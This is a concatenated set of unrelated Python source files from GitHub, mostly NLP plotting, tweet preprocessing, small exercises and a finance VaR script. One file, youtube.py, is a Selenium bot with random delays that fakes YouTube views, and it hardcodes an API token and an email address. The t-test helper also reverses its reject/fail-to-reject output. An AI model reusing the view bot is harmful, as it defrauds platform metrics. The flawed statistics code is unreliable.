= 5\n fig, ax = plt.subplots(ncols = 1, nrows = 3, figsize = (14, 8))\n\n # Get the top 20 most frequent words across all repos.\n clean_words = ' '.join(readme for readme in df.clean)\n clean_words_freq = pd.Series(clean_words.split()).value_counts().head(20)\n\n # Combine all words for each programming language into single strings.\n python_words = ' '.join(text for text in df[df.language == 'Python'].clean)\n cpp_words = ' '.join(text for text in df[df.language == 'C++'].clean)\n javascript_words = ' '.join(text for text in df[df.language == 'JavaScript'].clean).replace(' ', '')\n\n # Remove the top 20 most frequent words across all repos for each group.\n python_words = ' '.join(word for word in python_words.split() if word not in clean_words_freq)\n cpp_words = ' '.join(word for word in cpp_words.split() if word not in clean_words_freq)\n javascript_words = ' '.join(word for word in javascript_words.split() if word not in clean_words_freq)\n\n # Create plots for the most frequent words for each programming language\n\n python_words_freq = pd.Series(python_words.split())\n python_words_freq.value_counts().head(n).plot.barh(ax = ax[0])\n ax[0].set_title('Most Frequent Words in Python Repository READMEs')\n ax[0].set_xlabel('Word Count')\n ax[0].set_ylabel('Words')\n\n cpp_words_freq = pd.Series(cpp_words.split())\n cpp_words_freq.value_counts().head(n).plot.barh(ax = ax[1])\n ax[1].set_title('Most Frequent Words in C++ Repository READMEs')\n ax[1].set_xlabel('Word Count')\n ax[1].set_ylabel('Words')\n\n javascript_words_freq = pd.Series(javascript_words.split())\n javascript_words_freq.value_counts().head(n).plot.barh(ax = ax[2])\n ax[2].set_title('Most Frequent Words in JavaScript Repository READMEs')\n ax[2].set_xlabel('Word Count')\n ax[2].set_ylabel('Words')\n\n plt.tight_layout()\n\n plt.show()\n\n################################################################################\n\ndef plot_contains_keywords(df: pd.DataFrame) -> None:\n '''\n Plot a distribution of the contains_keywords features for each \n programming language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n fig, ax = plt.subplots(ncols = 3, nrows = 1, figsize = (14, 4))\n\n sns.histplot(data = df[df.language == 'Python'], x = 'contains_python_keywords', ax = ax[0])\n ax[0].set_title('Python Repositories')\n ax[0].set_xlabel('Contains Python Keywords')\n\n sns.histplot(data = df[df.language == 'C++'], x = 'contains_cpp_keywords', ax = ax[1])\n ax[1].set_title('C++ Repositories')\n ax[1].set_xlabel('Contains C++ Keywords')\n\n sns.histplot(data = df[df.language == 'JavaScript'], x = 'contains_js_keywords', ax = ax[2])\n ax[2].set_title('JavaScript Repositories')\n ax[2].set_xlabel('Contains JavaScript Keywords')\n\n plt.show()\n\n################################################################################\n\ndef plot_bigrams(df: pd.DataFrame) -> None:\n '''\n Create plots displaying the most common bi-grams for each programming \n language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n fig, ax = plt.subplots(ncols = 1, nrows = 3, figsize = (14, 8))\n\n python_clean_words = ' '.join(readme for readme in df[df.language == 'Python'].clean)\n cpp_clean_words = ' '.join(readme for readme in df[df.language == 'C++'].clean)\n javascript_clean_words = ' '.join(readme for readme in df[df.language == 'JavaScript'].clean).replace(' ', '')\n\n python_bigrams = pd.Series(nltk.bigrams(python_clean_words.split()))\n python_bigrams.value_counts().head(5).plot.barh(ax = ax[0])\n ax[0].set_title('Most common bi-grams for Python repositories')\n ax[0].set_xlabel('Count')\n ax[0].set_ylabel('Bi-Gram')\n\n cpp_bigrams = pd.Series(nltk.bigrams(cpp_clean_words.split()))\n cpp_bigrams.value_counts().head(5).plot.barh(ax = ax[1])\n ax[1].set_title('Most common bi-grams for C++ repositories')\n ax[1].set_xlabel('Count')\n ax[1].set_ylabel('Bi-Gram')\n\n javascript_bigrams = pd.Series(nltk.bigrams(javascript_clean_words.split()))\n javascript_bigrams.value_counts().head(5).plot.barh(ax = ax[2])\n ax[2].set_title('Most common bi-grams for JavaScript repositories')\n ax[2].set_xlabel('Count')\n ax[2].set_ylabel('Bi-Gram')\n\n plt.tight_layout()\n\n plt.show()\n\n################################################################################\n\ndef plot_readme_size_vs_language(df: pd.DataFrame, group_column: str = 'language') -> None:\n '''\n Create a plot that shows the average readme size grouping by the \n group_column parameter. By default this will show the average readme \n size for each programming language in the target variable.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n\n group_column: str, optional\n The column to group the data by.\n '''\n\n plt.figure(figsize = (14, 4))\n\n df.groupby(group_column).readme_size.mean().plot.barh()\n plt.title('Average README file size by programming language')\n\n plt.xlabel('Average Character Count')\n plt.ylabel('Programming Language')\n\n plt.show()\n\n################################################################################\n\ndef one_sample_ttest(df: pd.DataFrame, sample: pd.DataFrame, column: str, alternative: str = 'two-sided') -> None:\n '''\n Conduct a one sample t-test using the provided dataframe and sample \n dataframe. The hypothesis is tested on the column parameter. By \n default a two sided t-test is conducted.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the full population of the data.\n\n sample: DataFrame\n A pandas dataframe containing the sample that is being tested.\n\n column: str\n The feature in the data that will be tested.\n\n alternative: str, optional\n The type of t-test to perform. The default is a two-sided t-test.\n '''\n\n alpha = 0.05\n\n t, p = stats.ttest_1samp(sample[column], df[column].mean(), alternative = alternative)\n\n if p < alpha:\n print('Fail to reject H0')\n else:\n print('Reject H0')","repo_name":"Garcia-Hensley-Nichols-NLP-project/GHN-NLP-project","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"8614083840","text":"# Built from code from: https://www.pluralsight.com/guides/building-a-twitter-sentiment-analysis-in-python\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport string\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import wordpunct_tokenize\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom nltk.stem import PorterStemmer\r\nfrom nltk.stem import LancasterStemmer\r\nfrom nltk.stem.util import prefix_replace\r\nfrom nltk.stem.util import suffix_replace\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport nltk\r\n# run first time\r\n# nltk.download('stopwords')\r\n# nltk.download('punkt')\r\n# nltk.download('wordnet')\r\n# nltk.download('omw-1.4')\r\n\r\n# Read in file\r\ndf = pd.read_excel(\"Sample Tweets.xlsx\", sheet_name = 'Ratings').drop(columns = ['Unnamed: 0'])\r\n\r\n# count CAPITAL words, excluding I and A - does include positions and acronyms though\r\ndf['capitals'] = [len(re.findall(r'\\b[A-Z]+\\b(?\\?@\\[\\\\\\]\\^_`{\\|}~]\",' ', new_tweet)\r\n \r\n # Replace abreviations that require numbers\r\n new_tweet = new_tweet.replace(' s ', ' safety ') # as in S and not 80s, 90s, etc.\r\n new_tweet = new_tweet.replace(' b4 ', ' before ')\r\n \r\n # Remove all numbers\r\n new_tweet = re.sub(r'\\d', '', new_tweet)\r\n \r\n # Replace abreviations with punctuation and numbers gone\r\n for old, new in abr_dict.items():\r\n new_tweet = new_tweet.replace(old, new)\r\n\r\n tweet_tokens = wordpunct_tokenize(new_tweet) # separates words and punctuation and spellchecks (sometimes)\r\n \r\n # Remove emojis and weird (non-english alphabet) characters\r\n demoji = [w.encode('ascii', 'ignore').decode('ascii') for w in tweet_tokens]\r\n # Remove stop words\r\n filtered_words = [w for w in demoji if not w in stop_words]\r\n\r\n # stemm\r\n ps = PorterStemmer() # removes suffixes - makes it look very strange and unreadable, including proper nouns\r\n # ls = LancasterStemmer() # more aggressive suffix removal\r\n stemmed_words = [ps.stem(w) for w in filtered_words]\r\n # stemmed_words = [ls.stem(w) for w in filtered_words]\r\n \r\n # lemmatize\r\n lemmatizer = WordNetLemmatizer()\r\n lemma_words = [lemmatizer.lemmatize(w, pos='v') for w in stemmed_words] # changes verbs to same tense\r\n \r\n # Remove single letters left (d and c from d.c., s from 80s, etc.)\r\n final_words = [w for w in lemma_words if len(w) > 1]\r\n # join words again\r\n final_tweet = \" \".join(final_words)\r\n # Remove extra whitespace\r\n # final_tweet = \" \".join(final_tweet.split())\r\n\r\n \r\n return final_tweet\r\n\r\n# Preprocess data\r\ndf.text = df['text'].apply(preprocess_tweet_text)\r\n\r\ndf.rename(columns = {'Sentiment Rating' : 'sentiment'}, inplace = True)\r\ndf.to_csv(\"preprocessed_tweets.csv\")\r\n","repo_name":"sarah2wise/nfl_twitter_prediction","sub_path":"Preprocessing_Text.py","file_name":"Preprocessing_Text.py","file_ext":"py","file_size_in_byte":9672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"24491746906","text":"import concurrent.futures\r\nimport BlynkLib\r\nimport sys\r\nimport time \r\nimport requests\r\nimport random\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nif sys.version_info[0] > 2:\r\n\tfrom http.cookiejar import LWPCookieJar\r\n\tfrom urllib.request import Request, urlopen\r\n\tfrom urllib.parse import quote_plus, urlparse, parse_qs\r\nelse:\r\n\tfrom cookielib import LWPCookieJar\r\n\tfrom urllib import quote_plus\r\n\tfrom urllib2 import Request, urlopen\r\n\tfrom urlparse import urlparse, parse_qs\r\n\r\n\r\n_URL = 'https://www.youtube.com/watch?v=NrzLnl3tH0U?autoplay=1'\r\n_MAIL = 'thuykieulk1999@gmail.com'\r\n_VIEW = 0\r\n\r\nblynk = BlynkLib.Blynk(token = 'e80ff069a180413cb357e059bb0a1568' , server = 'blynk.getblocky.com')\r\nimport _thread\r\n_thread.start_new_thread(blynk.run,())\r\n\r\nwhile blynk.state != BlynkLib.AUTHENTICATED:\r\n pass\r\n\r\ndef _viewCount():\r\n html = requests.get(_URL).text.split('\\n')\r\n for x in html :\r\n if 'watch-view-count' in x :\r\n viewCount = int(x[116:].split(' ')[0])\r\n return viewCount\r\n return None\r\n\r\ndef _viewCheckRoutine():\r\n while True :\r\n time.sleep(10)\r\n currentCount = _viewCount()\r\n if currentCount != _VIEW :\r\n currentCount = _VIEW\r\n blynk.email(_MAIL , \"Youtube View\" , \"View : {}\".format(_viewCount()))\r\n_thread.start_new_thread(_viewCheckRoutine,())\r\n\r\ndef randomDelay():\r\n delayTime = random.randrange(20 , 50)\r\n time.sleep(delayTime)\r\n\r\n\r\ndef chromeThread (a=0):\r\n for i in range(5):\r\n if i <5:\r\n randomDelay()\r\n web = webdriver.Chrome()\r\n web.get(_URL)\r\n time.sleep(120)\r\n randomDelay()\r\n web.quit()\r\n else:\r\n break\r\n\r\n\r\n\r\n\r\n\r\nwith concurrent.futures.ThreadPoolExecutor (max_workers=4) as ex :\r\n threads = {ex.submit(chromeThread,0) : 0 for i in range(1)}\r\n for future in concurrent.futures.as_completed(threads):\r\n url = threads[future]\r\n try :\r\n data = future.result()\r\n except Exception as err:\r\n print(err)\r\n","repo_name":"ltdpttk/pass","sub_path":"youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"73278266130","text":"import itertools\r\n\r\ndef dev_options_form_parts(patrs_number):\r\n option = [1,0]\r\n option_list = []\r\n n=0\r\n while n < patrs_number:\r\n for rec in option:\r\n print(rec)\r\n \r\n option_list.append(option + 0)\r\n #option_list.append(option + 1)\r\n n = n+1\r\n return option_list\r\n# i läuft von 1 bis n\r\n#soll eine [0,1] generieren\r\n#diese verduppeln\r\n#jedes element aus [[0,1,0,0,i],[2i]] mit nx1 und 2nx0 erweitern\r\n\r\ndef gen_all_possible_job_sequences(jobs_data):\r\n jobs =[]\r\n for operation, job_list in jobs_data.items():\r\n for job in job_list:\r\n jobs.append(job)\r\n\r\n job_possibilities =itertools.permutations(jobs)\r\n return\r\n","repo_name":"wasilina83/opt_jobshop","sub_path":"optionsgenerator.py","file_name":"optionsgenerator.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"36571544221","text":"import os\nimport art\n\nart\n\nno_more_bidders = False\n\nbids = {}\n\ndef find_highest_bidder(bids):\n\n highest_bid = 0\n winner = \"\"\n\n for bidder in bids:\n bid_amount = bids[bidder]\n if bid_amount > highest_bid:\n highest_bid = bid_amount\n winner = bidder\n os.system('cls')\n print(f\"The winner is {winner} with a bid of £{highest_bid}\")\n\nwhile not no_more_bidders:\n\n name = input(\"Please enter your name: \")\n bid = int(input(\"Please enter your bid: \"))\n\n bids[name] = bid\n\n if input(\"Are there any more bidders? Yes / No : \").lower() == \"no\":\n no_more_bidders = True\n find_highest_bidder(bids)\n\n else:\n os.system('cls')\n\n","repo_name":"dcooper-holmes/PythonProjects","sub_path":"100-Days-Of-Code/Day-9-Secret-Auction/SecretAuction.py","file_name":"SecretAuction.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"40003010510","text":"import math\n\ndef nCr(n,r):\n Nf=math.factorial(n)\n Rf=math.factorial(r)\n NminusRf=math.factorial(n-r)\n return Nf//(Rf*NminusRf)\n\n# n,r=map(int,input().split())\nn=input(\"n>>\")\nr=input(\"r>>\")\n\nprint(nCr(n,r))","repo_name":"shinkeonkim/KMU_Class","sub_path":"1-1/python/funtion_factorial.py","file_name":"funtion_factorial.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"10315422689","text":"import pandas as pd\r\nimport numpy as np\r\n\r\ndef PLcalc(lastweek, thisweek):\r\n \tS= 'S' # prefix\r\n \tT = '.txt' # suffix\r\n \tBS = 'BS'\r\n\r\n \tdate = str(lastweek) # date\r\n \tFNlast = S+date+T # filename\r\n \tSlast = pd.read_table(FNlast, sep=' ', header=None)\r\n\r\n \tdate = str(thisweek) # date\r\n \tFNthis = S+date+T # filename\r\n \tSthis = pd.read_table(FNthis, sep=' ', header=None)\r\n\r\n \tdate = str(lastweek)\r\n \tFNBSlast = BS+date+T\r\n \tBSlast = pd.read_table(FNBSlast,sep=' ', header=None )\r\n \t#print(BSlast)\r\n\r\n \tPL = ((Sthis[1]-Slast[1])/Slast[1]*BSlast[1])+((Sthis[2]-Slast[2])/Slast[2]*BSlast[2])\r\n \t#print(PL)\r\n\r\n \tCthis = BSlast[0]\r\n \tAthis0 = Sthis[1]/Slast[1]*BSlast[1]\r\n \tAthis1 = Sthis[2]/Slast[2]*BSlast[2]\r\n \tBSthis = pd.concat([Cthis, Athis0, Athis1],axis=1)\r\n \t#print(BSthis)\r\n\r\n \tNetValue=Cthis+Athis0+Athis1\r\n \t#print(NetValue)\r\n\r\n \tdate = str(thisweek)\r\n \tBSthis.to_csv(BS+date+T, sep=' ', header=False, index=False)\r\n \treturn PL\r\n\r\ndef var_calc(thisweek,term):\r\n\tS = 'S' # prefix\r\n\tT = '.txt' # suffix\r\n\tBS = 'BS'\r\n\r\n\tnames = ['cash','tyo','ben']\r\n\tr = []\r\n\tfor name in names:\r\n\t\tFileName = name + '.csv'\r\n\t\tdf = pd.read_csv(FileName)\r\n\t\ta_df = df.values\r\n\t\titemcounter = 0\r\n\t\tfor item in a_df:\r\n\t\t\tif itemcounter ==0:\r\n\t\t\t\tr1 = []\r\n\t\t\t\titemcounter +=1\r\n\t\t\telse:\r\n\t\t\t\tvaluetoday = a_df[itemcounter][0]\r\n\t\t\t\tvalueyesterday = a_df[itemcounter-1][0]\r\n\t\t\t\treturntoday = (valuetoday-valueyesterday)/valueyesterday\r\n\t\t\t\tr1.append(returntoday)\r\n\t\t\t\titemcounter +=1\r\n\t\tr.append(r1)\r\n\r\n\tdf = pd.DataFrame(data = r, index = names)\r\n\t#print(df)\r\n\r\n\t#toyota = df.iloc[1,:]\r\n\t#sony = df.iloc[2,:]\r\n\r\n\tmu = df.mean(axis=1)\r\n\t#print(mu)\r\n\tdate = str(thisweek)\r\n\tFNBSthis = BS+date+T\r\n\tbs = pd.read_table(FNBSthis, sep=' ', names = names)\r\n\tbst = bs.T\r\n\r\n\tbsa = np.array(bs)\r\n\tbsta = np.array(bst)\r\n\t#print(bsa)\r\n\t#print(bsta)\r\n\r\n\tdot = np.dot(bsa, mu) #行列の内積\r\n\t#print(dot)\r\n\r\n\tcov = np.cov(df, rowvar = 1, bias = 1) #共分散行列\r\n\t#print(cov)\r\n\r\n\t#dot3 = np.dot(np.dot(bsa, cov), bsta)\r\n\t#print(dot3)\r\n\r\n\tdot3 = bsa@cov@bsta #行列の掛算3つ以上\r\n\t#print(dot3)\r\n\tT = term\r\n\tVaR = -dot*T + 2.33*np.sqrt(dot3*T)\r\n\t#print(VaR)\r\n\treturn VaR","repo_name":"kazutaka-lab/tech-base","sub_path":"my_function.py","file_name":"my_function.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"15589942112","text":"from decouple import config\nfrom datetime import datetime\nimport os\nimport requests\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.pool import NullPool\n\nAPI_TOKEN = config('API_TOKEN')\nDATABASE_URL = config('DATABASE_URL')\nFIXIE_URL = config('FIXIE_URL')\nURI = DATABASE_URL[:8] + 'ql' + DATABASE_URL[8:]\n\ndate = datetime.utcnow()\n\nif date.weekday() == 2:\n\n club_tag = '#2YPY9LVV9'\n headers = {\n 'Authorization' : f'Bearer {API_TOKEN}',\n }\n proxies = {\n 'http' : os.environ.get('FIXIE_URL', ''),\n 'https' : os.environ.get('FIXIE_URL', ''),\n }\n response = requests.get(\n # the hashtag '#' is encoded as '%23' in the URL\n f'https://api.brawlstars.com/v1/clubs/%23{club_tag[1:]}/members',\n headers=headers,\n proxies=proxies,\n )\n club_members_list = response.json()['items']\n \n season = f'{date.year}-{date.isocalendar().week}'\n club_members_df = pd.DataFrame(\n {\n 'season' : [season] * len(club_members_list),\n 'player_tag' : [member['tag'] for member in club_members_list],\n 'player_name' : [member['name'] for member in club_members_list],\n 'trophies' : [member['trophies'] for member in club_members_list],\n },\n )\n \n engine = create_engine(URI, poolclass=NullPool)\n with engine.connect() as connection:\n club_members_df.to_sql(\n 'club_members',\n connection,\n if_exists='append',\n index=False\n )\n connection.execute(\n f''' INSERT INTO job_log (job_timestamp, job)\n VALUES('{date}', 'get_club_members.py'); '''\n )\n\n print('Script get_club_members.py executed successfully.')\n\nelse:\n print('Today is not Wednesday.')\n","repo_name":"pascalaigner/brawl-stars-club-league","sub_path":"scheduled_jobs/get_club_members.py","file_name":"get_club_members.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
+{"seq_id":"34943596347","text":"from multiprocessing import Pool\nimport os, time, random\n\n''''\n当需要创建的⼦进程数量不多时,可以直接利⽤multiprocessing中的Process\n动态成⽣多个进程,但如果是上百甚⾄上千个⽬标,⼿动的去创建进程的⼯\n作量巨⼤,此时就可以⽤到multiprocessing模块提供的Pool⽅法。\n初始化Pool时,可以指定⼀个最⼤进程数,当有新的请求提交到Pool中时,\n如果池还没有满,那么就会创建⼀个新的进程⽤来执⾏该请求;但如果池中\n的进程数已经达到指定的最⼤值,那么该请求就会等待,直到池中有进程结\n束,才会创建新的进程来执⾏\n'''\n\n\ndef worker(msg):\n t_start = time.time()\n print(\"%s开始执⾏,进程号为%d\" % (msg, os.getpid()))\n # random.random()随机⽣成0~1之间的浮点数\n time.sleep(random.random() * 2)\n t_stop = time.time()\n print(msg, \"执⾏完毕,耗时%0.2f\" % (t_stop - t_start))\n\n\npo = Pool(3) # 定义⼀个进程池,最⼤进程数3\nfor i in range(0, 10):\n # Pool.apply_async(要调⽤的⽬标,(传递给⽬标的参数元祖,))\n # 每次循环将会⽤空闲出来的⼦进程去调⽤⽬标 如果超过了指定的最大数量 也会添加进去的\n # apply_async 是非堵塞的 apply是堵塞的\n po.apply_async(worker, (i,))\n # po.apply(worker, (i,))\n print(\"----start----\")\npo.close() # 关闭进程池,关闭后po不再接收新的请求\npo.join() # 等待po中所有⼦进程执⾏完成,必须放在close语句之后 不join池中的进程不会执行\nprint(\"-----end-----\")\n","repo_name":"zoushiqing/python","sub_path":"第二章 python核心编程/第2节Linux系统编程/进程/进程池Pool.py","file_name":"进程池Pool.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35748016529","text":"\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\nfrom torch.nn.modules.module import Module\n\nimport torch.nn as nn\n# from torchdiffeq import odeint_adjoint as odeint\nfrom torchdiffeq import odeint as odeint\nimport geotorch\nimport os\n\n\n\ndef act1(x): \n act_main = torch.nn.ELU(inplace=False)\n return 0.5*(torch.pow(F.relu(x),2)+ act_main(x))\n\n######### option 2 ############\n#act = ln((exp(x)+1)/2) if x>0 and = -sqrt(|x-1|)+1 if x<0\ndef act2(xx): \n m = 1.1 ##m >=1\n a = 0.1\n x = a*xx\n return -F.relu(torch.sqrt(torch.abs(torch.minimum(x-1,torch.tensor(0)))+1e-8)-1) + m*torch.log((torch.exp(F.relu(x))+1)/2+1e-8)\n\n######### option 3 ############\n#act = x^m+0.5x if x>0 and = -sqrt(|x-1|)+1 if x<0\ndef act3(xx): \n m = 3 ##m>=2\n a = 0.1\n x = a*xx\n return -F.relu(torch.sqrt(torch.abs(torch.minimum(x-1,torch.tensor(0)))+1e-8)-1) + torch.pow(F.relu(x),m)+ 0.5*F.relu(x)\n\n\nclass my_act(nn.Module):\n def __init__(self, act):\n super(my_act, self).__init__()\n self.act = act\n \n def forward(self, x):\n return self.act(x)\n\n##################### pos_constraint for weight ################\n\n######### option 1 ############\n# def pos_constraint(x):\n# # act = torch.sigmoaid()\n# return torch.sigmoid(x)*0.001\n\n######### option 2 ############\ndef pos_constraint(x):\n# act = torch.sigmoaid()\n return torch.abs(x)\n\n\nclass ReHU(nn.Module):\n \"\"\" Rectified Huber unit\"\"\"\n def __init__(self, d):\n super().__init__()\n self.a = 1/d\n self.b = -d/2\n\n def forward(self, x):\n return torch.max(torch.clamp(torch.sign(x)*self.a/2*x**2,min=0,max=-self.b),x+self.b)\n \n \n \n\n \n \ndef batch_jacobian(func, x, create_graph=False):\n # x in shape (Batch, Length)\n def _func_sum(x):\n return func(x).sum(dim=0)\n\n return torch.autograd.functional.jacobian(_func_sum, x, create_graph=create_graph).permute(1,2,0)\n\nclass myLinear(nn.Module):\n def __init__(self, size_in):\n super().__init__()\n \n ## input --> f0 (2*dim, 2*dim) --> f1 (2*dim, 8*dim) --> f2 (8*dim, 2*dim) --> f3 (2*dim, 1)\n #### from f1 to f3, we need the weight to be postive, that's why we call pos_constraint() below\n ##### all activation function need to be convex and non-decreasing #######\n \n \n self.dim = size_in\n \n # self.act = my_act(act1)\n # self.act = act2\n self.act = ReHU(d=0.1)\n\n \n max_ = +0.001\n min_ = -0.001\n # max_ = +0.0002\n # min_ = -0.0002\n \n w1_z = torch.Tensor(self.dim*8, self.dim*2)\n self.w1_z = nn.Parameter(w1_z)\n b1 = torch.Tensor(self.dim*8)\n self.b1 = nn.Parameter(b1)\n \n w2_z = torch.Tensor(self.dim*2, self.dim*8)\n self.w2_z = nn.Parameter(w2_z)\n b2 = torch.Tensor(self.dim*2)\n self.b2 = nn.Parameter(b2)\n \n w3_z = torch.Tensor(1, self.dim*2)\n self.w3_z = nn.Parameter(w3_z)\n b3 = torch.Tensor(1)\n self.b3 = nn.Parameter(b3)\n \n self.w0_y = nn.Linear(in_features=2*self.dim,out_features=2*self.dim) ####w0_y is free, and no constraints\n \n \n ####### initial the parameters ###########\n self.b1.data.uniform_(min_, max_)\n self.w1_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w1_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w1_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n\n # torch.nn.init.normal_(self.w1_z)\n # torch.nn.init.normal_(self.b1)\n\n # torch.nn.init.xavier_uniform_(self.w1_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b1, gain=1.0)\n # torch.nn.init.constant_(self.b1, val=0.001)\n\n ####### initial the parameters ###########\n self.b2.data.uniform_(min_, max_)\n self.w2_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w2_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w2_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n # torch.nn.init.normal_(self.w2_z)\n # torch.nn.init.normal_(self.b2)\n\n # torch.nn.init.xavier_uniform_(self.w2_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b2, gain=1.0)\n # torch.nn.init.constant_(self.b2, val=0.001)\n\n ####### initial the parameters ###########\n self.b3.data.uniform_(min_, max_)\n self.w3_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w3_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w3_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n # torch.nn.init.normal_(self.w3_z)\n # torch.nn.init.normal_(self.b3)\n\n # torch.nn.init.xavier_uniform_(self.w3_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b3, gain=1.0)\n # torch.nn.init.constant_(self.b3, val=0.001)\n\n\n\n \n def forward(self, x):\n z1 = self.act(self.w0_y(x))\n \n w1_z = pos_constraint(self.w1_z)\n z2 = F.linear(z1, w1_z, bias=self.b1)\n z2 = self.act(z2)\n \n \n w2_z = pos_constraint(self.w2_z)\n z3 = F.linear(z2, w2_z, bias=self.b2)\n z3 = self.act(z3)\n \n \n w3_z = pos_constraint(self.w3_z)\n z4 = F.linear(z3, w3_z, bias=self.b3)\n z4 = self.act(z4)\n \n \n f = z4\n \n return f\n \nclass Hamilton_V2(nn.Module):\n def __init__(self, size_in):\n super().__init__()\n self.dim = size_in\n \n self.H = myLinear(self.dim)\n\n \n def forward(self,t, input_):\n ### input_ should be 2xdim as [x, v], where x is manifold position and v is the tangent vector\n ### If you only have v, set x as 0\n \n x = input_[...,0:self.dim]\n v = input_[...,self.dim:]\n \n \n H_derivatie = batch_jacobian(lambda xx: self.H(xx), input_, create_graph=True).squeeze()\n # print(H_derivatie.shape)\n \n dx = H_derivatie[...,0:self.dim]\n dv = -1*H_derivatie[...,self.dim:]\n\n \n out = torch.hstack([dx, dv])\n \n \n return out\n\nif __name__=='__main__':\n ######## select convex activation function ###########\n act = act1\n\n\n dim = 16\n con = Hamilton_V2(dim)\n a = torch.zeros(128,dim*2)\n b = con(a)","repo_name":"zknus/Hamiltonian-GNN","sub_path":"layers/H_2.py","file_name":"H_2.py","file_ext":"py","file_size_in_byte":6360,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
+{"seq_id":"17327808549","text":"import webapp2\nimport urlparse\n\nimport tests\n\nimport types\nimport random\nimport os\nimport time\n\nclass MSDebugHandler( webapp2.RequestHandler ):\n\n def get( self, testname, path ):\n start_time = time.time()\n \n if len(path) == 0:\n path = \"/\"\n\n if path[0] != '/':\n path = \"/\" + path\n \n args = self.request.GET.dict_of_lists()\n \n for (k,v) in args.items():\n if type(v) == types.ListType and len(v) == 1:\n args[k] = v[0]\n \n # debug request\n test = getattr( tests, testname )\n status = None\n msg = None\n if test == None:\n status = 404\n msg = \"No such test '%s'\" % testname\n else:\n status, msg = test.test( path, args )\n\n self.response.status = status\n self.response.headers['X-Total-Time'] = str( int( (time.time() - start_time) * 1e9) )\n self.response.write( msg )\n return\n\n def put( self, _path ):\n pass","repo_name":"syndicate-storage/syndicate","sub_path":"ms/tests/debughandler.py","file_name":"debughandler.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"}
+{"seq_id":"24854823973","text":"# handles modes besides graph3D, setting modes, and help\r\nfrom Graph3D import *\r\n\r\n# turns equation list to string\r\ndef formEquationString(equation):\r\n result = \"\"\r\n for entry in equation:\r\n result += str(entry)\r\n return result\r\n\r\ndef getCursorPosition(data):\r\n if len(data.inputs)==0:\r\n return [0,0]\r\n row = data.inputs[:data.cursorListPosition].count(\"\\n\")\r\n totalRows = data.inputs.count(\"\\n\")\r\n centerRow = totalRows/2\r\n textDY = (row-centerRow)*data.textLineHeight\r\n if data.cursorListPosition==0:\r\n textDX = 0\r\n elif data.inputs[data.cursorListPosition-1]==\"\\n\":\r\n textDX = 0\r\n else:\r\n lineStartIndex = data.cursorListPosition-1\r\n while True:\r\n if lineStartIndex==0:\r\n break\r\n elif data.inputs[lineStartIndex-1] != \"\\n\":\r\n lineStartIndex -= 1\r\n else:\r\n break\r\n lineDistance = 0\r\n for i in range(lineStartIndex, data.cursorListPosition):\r\n lineDistance += len(str(data.inputs[i]))\r\n textDX = lineDistance*data.textWidth\r\n data.cursorPosition = [textDX, textDY]\r\n\r\n################################################################################\r\n## KeyPressed\r\n################################################################################\r\n\r\ndef keyPressed3DOptions(event, data):\r\n if data.mode in [\"function3DList\", \"parametric3D2PList\", \"parametric3D1PList\"]:\r\n keyPressed3DList(event, data)\r\n elif data.mode in [\"function3DInput\", \"parametric3D2PInput\", \"parametric3D1PInput\"]:\r\n keyPressed3DInput(event, data)\r\n\r\ndef keyPressed3DList(event, data):\r\n if data.mode==\"function3DList\":\r\n graphList = data.graphsFunction3D\r\n boxFactor = 1\r\n elif data.mode==\"parametric3D2PList\":\r\n graphList = data.graphsParametric3D2P\r\n boxFactor = 2\r\n elif data.mode==\"parametric3D1PList\":\r\n graphList = data.graphsParametric3D1P\r\n boxFactor = 2\r\n boxHeight = 